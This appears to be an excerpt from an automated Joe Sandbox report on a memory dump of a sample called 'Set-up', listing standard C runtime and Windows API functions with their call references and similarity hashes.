Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ExceptionH_prolog3_catchThrow_malloc_crtmallocstd::exception::exception
String ID: bad allocation
API String ID: 2340149201-2104205924
Opcode ID: 729223b3df68eff74393fc52cc526162991d3660bdfc451e714fe3635bcee568
Instruction ID: c6cfd6ba9bf52a3cd26f539873b693695545e1dab3e9c5cc2c6aff93345a20bf
Opcode Fuzzy Hash: 729223b3df68eff74393fc52cc526162991d3660bdfc451e714fe3635bcee568
Instruction Fuzzy Hash: 8C015E75900288AEDB28DF64D843F9DBBB4EF08394F108059F104AF291EBB89D00CB60

Function 6BB6215F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6BB62200,00000008,6BB875E9,00000000,00000000), ref: 6BB62170
_lock.MSVCR100(0000000D), ref: 6BB621A4

Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E

InterlockedIncrement.KERNEL32(?), ref: 6BB621B1

Part of subcall function 6BB62228: _unlock.MSVCR100(0000000D,6BB621C3), ref: 6BB6222A

_lock.MSVCR100(0000000C), ref: 6BB621C5

Strings

KERNEL32.DLL, xrefs: 6BB6216B

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _lock$CriticalEnterHandleIncrementInterlockedModuleSection_unlock
String ID: KERNEL32.DLL
API String ID: 2973837600-2576044830
Opcode ID: a2333e82f890a2209dcd0939ce883e5cdd0b26ce11e86b0d669418b630bf2bcb
Instruction ID: 8882b848e82a322dcf04eb7a0067a65e7c88eab16ea55cf413676a8243307b92
Opcode Fuzzy Hash: a2333e82f890a2209dcd0939ce883e5cdd0b26ce11e86b0d669418b630bf2bcb
Instruction Fuzzy Hash: 36016D71405B80DEE7209F75C84674DBBF0BF413A5F10494ED4DA972A0EBB8AE40CB65

Function 6BB97100 Relevance: 7.6, APIs: 5, Instructions: 100COMMON

Download Yara Rule

APIs

QueryDepthSList.KERNEL32(?,?,?,?,?,?,6BB969F3,?,?), ref: 6BB9717E
InterlockedPushEntrySList.KERNEL32(?,?,?,?,?,?,6BB969F3,?,?), ref: 6BB97193
QueryDepthSList.KERNEL32(?,?,?,?,?,6BB969F3,?,?), ref: 6BB9719A
InterlockedFlushSList.KERNEL32(?,?,?,?,?,6BB969F3,?,?), ref: 6BB971C9

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: List$DepthInterlockedQuery$EntryFlushPush
String ID:
API String ID: 4063097673-0
Opcode ID: 08966bef877b80835c40795176e7cbc2dc94fe655475285ddf866755327398f7
Instruction ID: 71b82e41ebbfa1989b689c74a8c7b4105807be8ef507f5ee4a7552439c7e2bdc
Opcode Fuzzy Hash: 08966bef877b80835c40795176e7cbc2dc94fe655475285ddf866755327398f7
Instruction Fuzzy Hash: 41319C76500565AFCB00EF29D9809AA73E4FF4B32472545AAE816DB700DB78FD41CBE0

Function 6BBA3E78 Relevance: 7.6, APIs: 5, Instructions: 100COMMON

Download Yara Rule

APIs

QueryDepthSList.KERNEL32(80000000,-00000001,00000000,?,?,?,6BB994CF,00000000,?,00000000,6BB9F8EF,00000000,00000000,00000000,00000000,00000000), ref: 6BBA3EF6
InterlockedPushEntrySList.KERNEL32(80000008,-000000C8,?,6BB994CF,00000000,?,00000000,6BB9F8EF,00000000,00000000,00000000,00000000,00000000,?,?,6BB9682D), ref: 6BBA3F0D
QueryDepthSList.KERNEL32(80000008,?,6BB994CF,00000000,?,00000000,6BB9F8EF,00000000,00000000,00000000,00000000,00000000,?,?,6BB9682D,?), ref: 6BBA3F14
InterlockedFlushSList.KERNEL32(80000008,?,6BB994CF,00000000,?,00000000,6BB9F8EF,00000000,00000000,00000000,00000000,00000000,?,?,6BB9682D,?), ref: 6BBA3F43

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: List$DepthInterlockedQuery$EntryFlushPush
String ID:
API String ID: 4063097673-0
Opcode ID: 3dfd938ca33544d5ad0d84400069d617c20b6c59ee2ccf57456c1c8491e8d60d
Instruction ID: cffe00ffe99ed43c9d215e424ea9566452e35efa2a40d967fad815aaded54f01
Opcode Fuzzy Hash: 3dfd938ca33544d5ad0d84400069d617c20b6c59ee2ccf57456c1c8491e8d60d
Instruction Fuzzy Hash: 6131D276A14565AFCB10CF28C9809AAB3F8FF4A320B158559E816CB700D739F941CFE0

Function 6BB6C656 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

_lock.MSVCR100(00000001,6BB6C6A0,00000010,6BB6C872,6BB6C8B0,0000000C), ref: 6BB6C66B

Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E

_malloc_crt.MSVCR100(00000038,6BB6C6A0,00000010,6BB6C872,6BB6C8B0,0000000C), ref: 6BB88F66
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,6BB6C6A0,00000010,6BB6C872,6BB6C8B0,0000000C), ref: 6BB88F8E
free.MSVCR100(01822288), ref: 6BB88FA0

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: CriticalSection$CountEnterInitializeSpin_lock_malloc_crtfree
String ID:
API String ID: 954917037-0
Opcode ID: 00816b152f2fe2ce1cb4892808e7e7ae67be07e2ff9453a0423a20b246c5b217
Instruction ID: eea778f9fff3ff5b3f5c1fd952beb637306933fd50074ea85b2071bc2d5545af
Opcode Fuzzy Hash: 00816b152f2fe2ce1cb4892808e7e7ae67be07e2ff9453a0423a20b246c5b217
Instruction Fuzzy Hash: F931CD71A042819FDB10CFA9C4C1A1EBBF0FF2A360B51415EE1559B290EB79ED419F44

Function 6BB975A4 Relevance: 7.6, APIs: 5, Instructions: 92COMMON

Download Yara Rule

APIs

?wait_for_multiple@event@Concurrency@@SAIPAPAV12@I_NI@Z.MSVCR100(00000000,00000001,00000001,00000000,880653CF,?,6BB95C86), ref: 6BB975FB
?_SpinOnce@?$_SpinWait@$0A@@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6BB97622
??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(6BB95CC6), ref: 6BB97663
?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100(?,?,?,?,?,?,?,?,6BB95CC6), ref: 6BB97692
?Block@Context@Concurrency@@SAXXZ.MSVCR100(?,?,?,?,?,?,?,?,6BB95CC6), ref: 6BB976B6

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Concurrency@@$Spin$??0scoped_lock@critical_section@?unlock@critical_section@?wait_for_multiple@event@A@@details@Block@Context@Once@?$_V12@V12@@Wait@$0
String ID:
API String ID: 358966004-0
Opcode ID: d9a8345214f68d461e2cac7a027da7e30bbe1983dc3fd9018b47dbba03319a8e
Instruction ID: 00446ce2422dd4b14b35216f8c8e65a6fc6428f4f10a2137c5f0bbfa17b436df
Opcode Fuzzy Hash: d9a8345214f68d461e2cac7a027da7e30bbe1983dc3fd9018b47dbba03319a8e
Instruction Fuzzy Hash: E5318B715483819FD710EF29E481B4AB7E4FB87764F100A3EF4A586290E7B9D548CBA2

Function 6BB6F457 Relevance: 7.6, APIs: 5, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6BB6F334: DName::operator+.LIBCMT ref: 6BB6F3A0

DName::operator+.LIBCMT ref: 6BB6F4BA
DName::operator+.LIBCMT ref: 6BB6F4C1

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 2a236ad64e7155741d3995566fc285a9308e1e7ad8831078c3a487c77e39d30d
Instruction ID: 84a6afd5746d3580f43cc95753dde0d4d49e71c808c91a8ab1595b5a05e6a3fa
Opcode Fuzzy Hash: 2a236ad64e7155741d3995566fc285a9308e1e7ad8831078c3a487c77e39d30d
Instruction Fuzzy Hash: FC31E172A402889FC710CF6CD8819EABBF9EF49744B40446EE5D6CB340E778AD41CB50

Function 6BB97785 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6BB9778C
??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(?,00000024,6BBA54DA,00000000,6BBA55E7,00000000,?,00000001,?,00000000,6BBA5EC0,?,?,?,00000000), ref: 6BB9779F

Part of subcall function 6BB9B030: __EH_prolog3.LIBCMT ref: 6BB9B037

malloc.MSVCR100(00000001,?,00000024,6BBA54DA,00000000,6BBA55E7,00000000,?,00000001,?,00000000,6BBA5EC0,?,?,?,00000000), ref: 6BB977E8
?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100(?,00000024,6BBA54DA,00000000,6BBA55E7,00000000,?,00000001,?,00000000,6BBA5EC0,?,?,?,00000000), ref: 6BB9783A
_freea_s.MSVCR100(00000000,?,00000024,6BBA54DA,00000000,6BBA55E7,00000000,?,00000001,?,00000000,6BBA5EC0,?,?,?,00000000), ref: 6BB97853

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Concurrency@@$??0scoped_lock@critical_section@?unlock@critical_section@H_prolog3H_prolog3_V12@@_freea_smalloc
String ID:
API String ID: 911861471-0
Opcode ID: 38bd23a89b7adf31a18b87cc886eb2a2c501600a58b251147a20aaca010b1755
Instruction ID: eaa3f9677139a12f0b163d2ac9ee2dae868ae30d69a1290699c58957265b95f7
Opcode Fuzzy Hash: 38bd23a89b7adf31a18b87cc886eb2a2c501600a58b251147a20aaca010b1755
Instruction Fuzzy Hash: 5B21A071E002918FDB05EFAAE8D1A5EB7F5FF46750B1040B9D955DB250DBBC9801CB90

Function 6BB775B1 Relevance: 7.6, APIs: 5, Instructions: 63COMMON

Download Yara Rule

APIs

_localtime64_s.MSVCR100(?,?), ref: 6BB77600
asctime_s.MSVCR100(?,00000000,?), ref: 6BB77613
_errno.MSVCR100 ref: 6BB77628
_invalid_parameter_noinfo.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6BB89D0A
_errno.MSVCR100 ref: 6BB89D16

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo_localtime64_sasctime_s
String ID:
API String ID: 2556715357-0
Opcode ID: dc1bbefaad9d6fd37e01dc0bea5bb49cb2c938f624e3e9e14c173556c444b568
Instruction ID: c7dd86dd7d1b4debdb53cc69cc3bfc62e1ca59ded31ee9ce25798395acb40522
Opcode Fuzzy Hash: dc1bbefaad9d6fd37e01dc0bea5bb49cb2c938f624e3e9e14c173556c444b568
Instruction Fuzzy Hash: 72115C31A002999BDF25EF3ADC41BDE73A5DF4A710F50407AE8109B140E77CC900CB94

Function 6BB6FAE4 Relevance: 7.6, APIs: 5, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcsnicoll_l.MSVCR100(?,?,?,00000000), ref: 6BB6FB02
_errno.MSVCR100 ref: 6BB8C7BD
_invalid_parameter_noinfo.MSVCR100 ref: 6BB8C7C8

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo_wcsnicoll_l
String ID:
API String ID: 1358483507-0
Opcode ID: f5980a937237d3a9837fa8ac43a88e4e21217a1dcfeed7bedbc2d3ff54a3f29b
Instruction ID: e12e846b483ed322a32c31381b1ce47551f53bf669ed932cb026dd2722ebb07e
Opcode Fuzzy Hash: f5980a937237d3a9837fa8ac43a88e4e21217a1dcfeed7bedbc2d3ff54a3f29b
Instruction Fuzzy Hash: 381125B55801E5EBDF200E65E8903BD32E5EB117A1F54879AF8648A284DB3DC840CBA1

Function 6BB70DAC Relevance: 7.6, APIs: 5, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.MSVCR100(?), ref: 6BB70DB6
_isatty.MSVCR100(00000000,?), ref: 6BB70DBC
__p__iob.MSVCR100 ref: 6BB88A2D
_malloc_crt.MSVCR100(00001000), ref: 6BB88A71

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: __p__iob_fileno_isatty_malloc_crt
String ID:
API String ID: 301265415-0
Opcode ID: b0e33a281db99699bc48fafba5dbe40ce34e3bd83499395ac8616115242dade8
Instruction ID: 88f238b5d0747deb16f34b1c9235990548e3b8bc6a0acd6655729cda98857a65
Opcode Fuzzy Hash: b0e33a281db99699bc48fafba5dbe40ce34e3bd83499395ac8616115242dade8
Instruction Fuzzy Hash: 931173728087829FD3609F79DC91647B7F8EB553A4B10892ED5A6C3640F779E4808B90

Function 6BB6C830 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_errno.MSVCR100(6BB6C8B0,0000000C), ref: 6BB6C8D6
_invalid_parameter_noinfo.MSVCR100(6BB6C8B0,0000000C), ref: 6BB894A7

Part of subcall function 6BB6C656: _lock.MSVCR100(00000001,6BB6C6A0,00000010,6BB6C872,6BB6C8B0,0000000C), ref: 6BB6C66B

_errno.MSVCR100(6BB6C8B0,0000000C), ref: 6BB894B3
_errno.MSVCR100(6BB6C8B0,0000000C), ref: 6BB894C0
@_EH4_CallFilterFunc@8.LIBCMT(6BC03610,?,000000FE,6BB6C8B0,0000000C), ref: 6BB894D6

Part of subcall function 6BB6C737: __wsopen_s.LIBCMT(?,?,00000000,?,00000180,00000000,?,?), ref: 6BB6C801

Part of subcall function 6BB6C8CC: _unlock_file.MSVCR100(?,6BB6C8A6), ref: 6BB6C8CF

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$CallFilterFunc@8__wsopen_s_invalid_parameter_noinfo_lock_unlock_file
String ID:
API String ID: 773299370-0
Opcode ID: 1c9e8976ff0fb63ec232ebdad60f27d332e7afd8d846cb672ae27d2975574560
Instruction ID: 25f5a64f84459698e1a9f859402a9a92981eb1358dac8c4887faccc4548afe70
Opcode Fuzzy Hash: 1c9e8976ff0fb63ec232ebdad60f27d332e7afd8d846cb672ae27d2975574560
Instruction Fuzzy Hash: 5E11E570940685EECF60AF79CC8267E37A5AF45394F698E41D428DB281FB7D8D808F61

Function 6BB77385 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

_calloc_crt.MSVCR100(00000001,00000004,00000000,00000000,0000003D,?,6BB773E6,74DEDF80,00000000,01821910), ref: 6BB773A8
_wcsdup.MSVCR100(00000000,00000000,00000000,0000003D,?,6BB773E6,74DEDF80,00000000,01821910), ref: 6BB773C5

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _calloc_crt_wcsdup
String ID:
API String ID: 1800982338-0
Opcode ID: 5b08de2ed221164f32a8d5774b068affb9a3b21a8141c1f95a01a0211a412f0c
Instruction ID: bfe5d42e77c8a05c28bd23b3e51701c05ba8a27fcf264a83abd2a71f06eca167
Opcode Fuzzy Hash: 5b08de2ed221164f32a8d5774b068affb9a3b21a8141c1f95a01a0211a412f0c
Instruction Fuzzy Hash: CB01F772A04251DBE720AB79DC01B5A77E8DB42778F260179E961D72C0EBBDD801CB60

Function 6BB6BD9A Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6BB907A6
GetCurrentProcessId.KERNEL32 ref: 6BB907B2
GetCurrentThreadId.KERNEL32 ref: 6BB907BA
GetTickCount.KERNEL32 ref: 6BB907C2
QueryPerformanceCounter.KERNEL32(?), ref: 6BB907CE

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 397036b398c79250e7f156f8731fea3f4a4daab3fc0e7223ec6d4ee434e88114
Instruction ID: e8764fc69244f9c2ded7ed923fe812319800126767c2dd441dda89a3767f4119
Opcode Fuzzy Hash: 397036b398c79250e7f156f8731fea3f4a4daab3fc0e7223ec6d4ee434e88114
Instruction Fuzzy Hash: 1311C276D002249BDF209FF8D84869EB7F8FB4E365F960961D511E7200DB79DA40CB91

Function 6BBAC86F Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6BB876A1,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BBAC4DA
free.MSVCR100(00000000,?,?,6BB876A1,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BBAC4DD
DeleteCriticalSection.KERNEL32(0000000E,?,?,6BB876A1,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BBAC504
DecodePointer.KERNEL32(00000006,6BB876A1,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BBAC880
TlsFree.KERNEL32(0000000E,6BB876A1,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BBAC89E

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: CriticalDeleteSection$DecodeFreePointerfree
String ID:
API String ID: 1464103408-0
Opcode ID: d580c3ee6ad2712d2fbf7391e45638e184da0bec92f237b26ce93635c732cbbb
Instruction ID: 11d75a78dcf839823c40533bcb9533f804b8b2a90a34efb55eae2867499a63e0
Opcode Fuzzy Hash: d580c3ee6ad2712d2fbf7391e45638e184da0bec92f237b26ce93635c732cbbb
Instruction Fuzzy Hash: EE01D232C08690ABDA305F288C85A69B3FCDF86671325075AE874D70A0CB2ECD458A34

Function 6BB61635 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB61641
_errno.MSVCR100 ref: 6BB6165B
_errno.MSVCR100 ref: 6BB61685
_errno.MSVCR100 ref: 6BB6168F
_errno.MSVCR100 ref: 6BB8C355

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 7f0233ba04b6b693044806ee86adc115b60e614443f263a97df727de8bae0fdc
Instruction ID: 5de0a920ba5f93664d7ef3ff0869e403c013d1e2fa7f27c1c3ed99861a141af5
Opcode Fuzzy Hash: 7f0233ba04b6b693044806ee86adc115b60e614443f263a97df727de8bae0fdc
Instruction Fuzzy Hash: D2019E74504395DFD7249F6AD481B2873A8DF163A8F1852A9E5508A190FB7CDC80CFA2

Function 6BB61C13 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

memcpy.MSVCR100(?,00000000), ref: 6BB61C47
_errno.MSVCR100 ref: 6BB898AC
_invalid_parameter_noinfo.MSVCR100 ref: 6BB898B6
_wmemset.LIBCMT ref: 6BB898CA
_errno.MSVCR100 ref: 6BB898DD

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo_wmemsetmemcpy
String ID:
API String ID: 286551074-0
Opcode ID: 0fc1868e71f3fb815dc008e129040931b69018a5b417317c345cb06ab3f3e45f
Instruction ID: 056a557f9827fd807287cdbbbc904acb2b4f0aa7cc12c89c6686af9fcafe103e
Opcode Fuzzy Hash: 0fc1868e71f3fb815dc008e129040931b69018a5b417317c345cb06ab3f3e45f
Instruction Fuzzy Hash: 8F01DF325442A9EFDF224E29EC017DD3764EF04B94F044026FD185A190F7BDC990CE82

Function 6BB6E2C0 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB6E2CC
_errno.MSVCR100 ref: 6BB6E2E6
